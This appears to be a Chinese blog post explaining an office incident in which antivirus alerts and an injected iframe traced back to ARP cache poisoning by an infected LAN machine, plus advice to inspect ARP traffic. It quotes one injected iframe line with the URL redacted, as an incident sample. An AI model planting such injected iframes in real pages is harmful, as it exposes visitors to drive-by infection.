ARP 缓存污染和IFRAME嵌入攻击

最近收到了一位IT行业朋友的来信,说他遇到了这么一个现象,百思不得其解。
<<<
我昨天遇到了一个非常郁闷的问题,我们公司有一个部门的PC只要打开IE赛门铁克就会就会提示我中毒,下面是中毒的日志:
Scan type:Auto-Protect Scan
Event:Security Risk Found!
Threat: Trojan.Exploit.131
File:C:\Documents and Settings\<username>\Local Settings\Temporary Internet Files\Content.IE5\...\ad2[1].c
Location:Unknown Storage
Action taken:Clean failed : Quarantine failed : Access denied
并且更奇怪的是只要开启IE在源代码里面就能在第一行看到如下一行代码:
<iframe src=http:<malicious URL> width=100 height=0 frameborder=0></iframe>
但是并没有弹出网页,后来过了几个小时整个部门的这个现象就自动消失了,开IE也不会中毒了,上面的那行代码也不再显示了,首先要声明那个部门没有做过任何操作。
>>>
这种现象背后的原因,就是ARP缓存污染(cache poison)加上IFrame 嵌入(Injection)的攻击。ARP cache poison这种攻击理论上提出了很久了,但是直到最近才开始比较多的被病毒程序所应用。
http://www.grc.com/nat/arp.htm是一篇非常好的介绍ARP缓存污染的文章。
简单的说,就是如果你的局域网中的一台机器被感染上病毒(例如通过一个IE的安全漏洞等等),病毒程序可以以这台机器(A),在局域网内部发起ARP cache poison的攻击,来把这台机器作为中间人插入到其它的机器(假设为B)和网关中。(典型的man-in-the-middle攻击)。然后,机器B的所有的http网络访问,都可以被A截获并插入IFRAME信息,以试图感染机器B。在这里,攻击者试图通过iframe让IE访问一个恶意站点。这个站点往往会利用微软最近的安全漏洞,如ANI安全漏洞等等。如果B的系统没有及时安装最新的安全补丁的话,就会被感染。
A 发现攻击无效,或 A 上的病毒被删除了的话,在机器 B 上你看到的这些奇怪的现象就会消失了。
如果存有网络活动记录,查看网络中的 ARP 的数据包,就可以确定是从那台机器发起的攻击。
我的微软的一个同事Neil Carpenter也有一篇不错的文章讨论这个问题。 http://blogs.technet.com/neilcar/archive/2007/06/28/arp-cache-poisoning-incident.aspx

你可能感兴趣的:(cache,IE,网络应用,活动,Security)